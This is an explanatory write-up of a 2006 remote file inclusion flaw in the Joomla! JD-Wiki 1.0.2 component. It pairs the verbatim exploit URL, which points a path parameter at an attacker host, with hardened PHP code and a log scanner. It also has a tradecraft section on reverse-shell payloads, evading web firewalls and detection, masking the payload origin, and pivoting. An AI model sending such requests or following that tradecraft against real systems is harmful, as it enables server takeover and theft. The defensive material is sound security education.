Understanding the Joomla! JD-Wiki 1.0.2 Remote File Inclusion Exploit

What this paper is
This paper details a security vulnerability found in JD-Wiki, a Joomla! component that integrates DokuWiki. The vulnerability is a Remote File Inclusion (RFI) flaw, which allows an attacker to execute commands on the target server by tricking the application into including and executing a remote file.
Simple technical breakdown
The JD-Wiki component, when handling certain requests, uses a parameter named mosConfig_absolute_path as the root of the paths it includes. If that parameter is pointed at a remote URL (one controlled by an attacker), the application includes and executes code fetched from that URL. This works because PHP's include and require functions accept URLs through their stream wrappers when allow_url_include is enabled, so an application that builds an include path from unsanitized request input hands the attacker control over which code runs.
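As an added example (not JD-Wiki's own code, which the paper does not reproduce), the following PHP contrasts the include pattern behind this bug class with a hardened replacement, and reports the php.ini settings that decide whether a URL in an include path is ever fetched. The file names, the JDWIKI_BASE constant and the helper names are assumptions.

```php
<?php
// Added example, not code from JD-Wiki or from the original paper.
// Shows (1) the include pattern behind this bug class, (2) a hardened
// replacement, and (3) a check of the php.ini settings that decide whether
// a URL in an include path is ever fetched. File names and JDWIKI_BASE are assumptions.

// --- 1. Vulnerable pattern (illustrative only, never called below) ---
// Mambo/Joomla!-era components expected the core to define
// $mosConfig_absolute_path before they ran. If the variable can instead be
// filled from the query string, the client chooses the include root.
function vulnerable_include(array $get): void
{
    $mosConfig_absolute_path = $get['mosConfig_absolute_path'] ?? '';
    // With allow_url_include=On, "http://shell/..." is downloaded and executed.
    include $mosConfig_absolute_path . '/lib/tpl/default/header.php';
}

// --- 2. Hardened pattern ---
define('JDWIKI_BASE', realpath(__DIR__));  // assumption: the component's own directory

function safe_include_path(string $relative): string
{
    // Refuse anything with a scheme or stream wrapper (http:, ftp:, php:, data:, ...)
    // and any embedded NUL byte.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $relative) || strpos($relative, "\0") !== false) {
        throw new InvalidArgumentException('scheme or wrapper in include path');
    }
    $resolved = realpath(JDWIKI_BASE . '/' . $relative);
    // realpath() is false for missing files and collapses "../", so a prefix
    // comparison on the result is enough to keep includes under JDWIKI_BASE.
    $prefix = JDWIKI_BASE . DIRECTORY_SEPARATOR;
    if ($resolved === false || strncmp($resolved, $prefix, strlen($prefix)) !== 0) {
        throw new InvalidArgumentException('include path missing or outside component directory');
    }
    return $resolved;
}

function hardened_include(): void
{
    // The template file is fixed by the code; nothing from the request reaches include.
    include safe_include_path('lib/tpl/default/header.php');
}

// --- 3. Configuration check ---
// Returns the three php.ini settings this bug class depends on. Target state:
// allow_url_fopen=Off (unless needed), allow_url_include=Off, open_basedir set.
function rfi_surface(): array
{
    return [
        'allow_url_fopen'   => filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN),
        'allow_url_include' => filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN),
        'open_basedir'      => ini_get('open_basedir') ?: '(not set)',
    ];
}

// Demonstration: the attacker's value and a traversal attempt are rejected;
// the legitimate template is accepted only if that file actually exists here.
foreach (['http://shell/', '../../../configuration.php', 'lib/tpl/default/header.php'] as $candidate) {
    try {
        echo "accepted: ", safe_include_path($candidate), "\n";
    } catch (InvalidArgumentException $e) {
        echo "rejected '$candidate': ", $e->getMessage(), "\n";
    }
}
print_r(rfi_surface());
```

Run it with the PHP CLI (php example.php). The scheme check rejects the paper's http://shell value before any filesystem or network access happens, and the realpath prefix check is what stops a local traversal even when the scheme check is satisfied; rfi_surface() is the quick way to confirm on a given host whether the include line in the vulnerable pattern could ever have reached the network.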
Complete code and payload walkthrough
The provided exploit description is very concise and doesn't contain explicit code in the traditional sense of a script or binary. Instead, it describes the method of exploitation using a URL.
Exploit URL Structure:
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://shell
Explanation of Components:
- /components/com_jd-wiki/lib/tpl/default/main.php: This is the target PHP file within the JD-Wiki component that is vulnerable. It is likely responsible for rendering wiki pages or handling template includes.
- ?mosConfig_absolute_path=: This is the vulnerable parameter. The name suggests it is intended to specify an absolute path for configuration or includes.
- http://shell: This is the attacker-controlled URL. The attacker would replace "shell" with a domain they control, which hosts a malicious PHP file. When the JD-Wiki component processes this URL, it attempts to fetch and include the content from http://shell. If the PHP include or require functions are used insecurely within main.php and are susceptible to RFI, the code from http://shell will be executed on the Joomla! server.
Mapping:
- main.php -> The vulnerable script that processes the mosConfig_absolute_path parameter.
- mosConfig_absolute_path -> The input parameter that, when controlled by an attacker with a remote URL, leads to RFI.
- http://shell -> The attacker-controlled remote resource containing malicious code.
Payload (Conceptual):
The "payload" here isn't raw shellcode bytes but rather the content of the file hosted at http://shell. This file would typically contain PHP code designed to achieve a specific malicious objective, such as:
- Web Shell: A PHP script that provides a command execution interface on the server.
- Information Disclosure: A script that leaks sensitive configuration files or database credentials.
- Further Exploitation: A script that downloads and executes other malware.
The original paper does not provide the content of the http://shell file, so its exact nature is unknown.
Practical details for offensive operations teams
- Required Access Level: Low. This is a remote vulnerability exploitable via a web browser or a simple HTTP request. No authenticated access to the Joomla! backend is required.
- Lab Preconditions:
- A vulnerable Joomla! installation with the JD-Wiki component (version 1.0.2) installed.
- A web server accessible to the target Joomla! server that can host attacker-controlled PHP files.
- Network connectivity between the target Joomla! server and the attacker-controlled web server.
- Tooling Assumptions:
- A web browser for manual testing.
- Tools like curl or wget for crafting HTTP requests.
- A simple HTTP server (e.g., Python's http.server, Apache, Nginx) to host the malicious PHP payload.
- Execution Pitfalls:
- Firewall/Network Restrictions: The target server might not be able to reach the attacker's hosting server due to outbound firewall rules.
- PHP Configuration (allow_url_fopen, allow_url_include): The vulnerability relies on PHP being configured to allow remote file inclusion. If allow_url_fopen is disabled, the RFI might not work. If allow_url_include is disabled, even if allow_url_fopen is enabled, the server refuses to include remote files.
- Input Sanitization: Later versions of JD-Wiki or Joomla! might have patched this specific vulnerability or implemented better input sanitization, preventing the mosConfig_absolute_path parameter from being interpreted as a remote URL.
- Payload Hosting: The attacker's server must be stable and accessible.
- Obfuscation: The attacker might need to obfuscate their payload to bypass basic web application firewalls (WAFs) or intrusion detection systems (IDS).
- Tradecraft Considerations:
- Reconnaissance: Identify the target Joomla! version and installed components to confirm the presence of JD-Wiki 1.0.2.
- Payload Staging: Prepare a small, effective PHP payload that can establish a reverse shell or provide command execution.
- Stealth: Use a reputable domain for hosting the payload to avoid immediate suspicion. Consider using a CDN or proxy to mask the origin of the payload.
- Post-Exploitation: Once a shell is obtained, immediately look for ways to escalate privileges or pivot to other systems.
Where this was used and when
- Context: This vulnerability was discovered and published in 2006. It targets a specific component (JD-Wiki 1.0.2) within the Joomla! CMS.
- Timeframe: The exploit was published on August 7, 2006. It would have been relevant for systems running Joomla! with this vulnerable component during that period and shortly thereafter, until patches were applied.
Defensive lessons for modern teams
- Vulnerability Management: Regularly scan for and patch known vulnerabilities in CMS platforms and their extensions.
- Input Validation: Implement strict input validation for all user-supplied data, especially parameters used in file inclusion or path operations. Sanitize and validate URLs.
- PHP Configuration Hardening:
- Disable allow_url_fopen and allow_url_include in php.ini unless absolutely necessary for legitimate application functionality. This is a critical defense against RFI.
- Restrict open_basedir to prevent PHP scripts from accessing files outside their designated directories.
- Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common attack patterns, including RFI attempts.
- Least Privilege: Run web servers and applications with the minimum necessary privileges to limit the impact of a successful compromise.
- Component Auditing: Be cautious when installing third-party extensions. Audit their code for security flaws or use reputable sources with a history of secure development.
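For the detection side of the lessons above, here is an added example (not from the paper) of a small PHP CLI script that flags RFI-style requests in combined-format web server access logs. It goes slightly beyond the single parameter in the paper: it reports any request that supplies a Mambo/Joomla! core variable such as mosConfig_absolute_path itself, and any query parameter whose decoded value begins with a URL scheme or stream wrapper. The log lines are constructed for the example and the host shell.example is a placeholder.

```php
<?php
// Added example, not from the original paper: flag RFI-style requests in
// Apache/Nginx combined-format access logs. The log lines are constructed.

$sampleLog = <<<'LOG'
203.0.113.5 - - [07/Aug/2006:10:12:01 +0000] "GET /index.php?option=com_jd-wiki&id=start HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.9 - - [07/Aug/2006:10:12:07 +0000] "GET /components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://shell.example/ HTTP/1.1" 200 210 "-" "curl/7.15"
203.0.113.9 - - [07/Aug/2006:10:12:09 +0000] "GET /components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=%68ttp%3A%2F%2Fshell.example%2F HTTP/1.1" 200 210 "-" "curl/7.15"
198.51.100.2 - - [07/Aug/2006:10:13:00 +0000] "GET /images/logo.png HTTP/1.1" 304 0 "-" "Mozilla/5.0"
LOG;

// Variables the Mambo/Joomla! core was supposed to set itself; a client
// supplying them is suspicious even when the value is not a URL.
const CORE_PARAMS = ['mosConfig_absolute_path', 'mosConfig_live_site'];

/** Decoded [name => value] query parameters from a request-line target. */
function query_params(string $target): array
{
    $q = parse_url($target, PHP_URL_QUERY);
    if (!is_string($q)) {
        return [];
    }
    $params = [];
    parse_str($q, $params);   // parse_str() percent-decodes, so %68ttp%3A becomes http:
    return $params;
}

/** Analyse one combined-format line; null if benign, otherwise a finding. */
function analyse_line(string $line): ?array
{
    if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"/', $line, $m)) {
        return null;   // not a combined-format line
    }
    [, $client, $method, $target] = $m;
    $reasons = [];
    foreach (query_params($target) as $name => $value) {
        if (!is_string($value)) {
            continue;   // array-style parameters are out of scope here
        }
        if (in_array($name, CORE_PARAMS, true)) {
            $reasons[] = "core variable '$name' supplied by client";
        }
        // Value starts with a scheme or stream wrapper: http:, ftp:, php:, data:, ...
        if (preg_match('#^\s*[a-z][a-z0-9+.\-]*:#i', $value)) {
            $reasons[] = "parameter '$name' carries a URL or wrapper: $value";
        }
    }
    if (!$reasons) {
        return null;
    }
    return ['client' => $client, 'method' => $method, 'target' => $target, 'reasons' => $reasons];
}

/** Scan a whole log and return the list of findings. */
function scan(string $log): array
{
    $findings = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $f = analyse_line($line);
        if ($f !== null) {
            $findings[] = $f;
        }
    }
    return $findings;
}

foreach (scan($sampleLog) as $f) {
    printf("%s %s %s\n  - %s\n", $f['client'], $f['method'], $f['target'],
        implode("\n  - ", $f['reasons']));
}
```

On the constructed lines the script reports the second and third requests only, each for both reasons, and the percent-encoded variant is caught because matching happens on the decoded value rather than on the raw request line. To run it against real logs, replace $sampleLog with file_get_contents() of the access log; the 200 status on the flagged lines is the detail worth correlating with outbound connections from the web server, since a server with allow_url_include off would still log the request but never reach out to the remote host.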
ASCII visual (if applicable)
This exploit is a direct HTTP request to a vulnerable server. An ASCII visual can illustrate the flow of the request and response.
+-----------------+        +-------------------+        +-----------------------------+
| Attacker's      |        | Target Joomla!    |        | Attacker's Payload          |
| Machine (Browser|        | Server (JD-Wiki)  |        | Server (e.g., http://shell) |
| / Curl)         |        |                   |        |                             |
+-----------------+        +-------------------+        +-----------------------------+
        |                          |                               |
        | HTTP Request             |                               |
        | (GET /...main.php?mosConfig_absolute_path=http://shell)  |
        |------------------------->|                               |
        |                          |                               |
        |                          | HTTP Request to Payload Server|
        |                          | (GET /...)                    |
        |                          |------------------------------>|
        |                          |                               |
        |                          | HTTP Response (Malicious PHP) |
        |                          |<------------------------------|
        |                          |                               |
        | HTTP Response (Rendered  |                               |
        | page with executed       |                               |
        | payload)                 |                               |
        |<-------------------------|                               |
        |                          |                               |
        | (Attacker receives       |                               |
        |  result of payload)      |                               |
Source references
- Paper URL: https://www.exploit-db.com/papers/2125
- Author: jank0
- Published: 2006-08-07
- Original Source: milw0rm.com
Original Exploit-DB Content (Verbatim)
####################################################################################
#JD-Wiki Remote File Include
------------------------------------------------------------------------------------
JD-Wiki is the Joomla! integration of the nice DokuWiki.
DokuWiki is a standards compliant, simple to use Wiki, mainly aimed at creating
documentation of any kind.
------------------------------------------------------------------------------------
#Bug Found by: jank0
#greetz: hackbsd crew
#risk: dangerous
##this bug allows a remote atacker to execute commands via rfi
path: ?mosConfig_absolute_path=
xpl:
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://shell
Contact: irc.undernet.org #hackbsd & #ircmasters
# milw0rm.com [2006-08-07]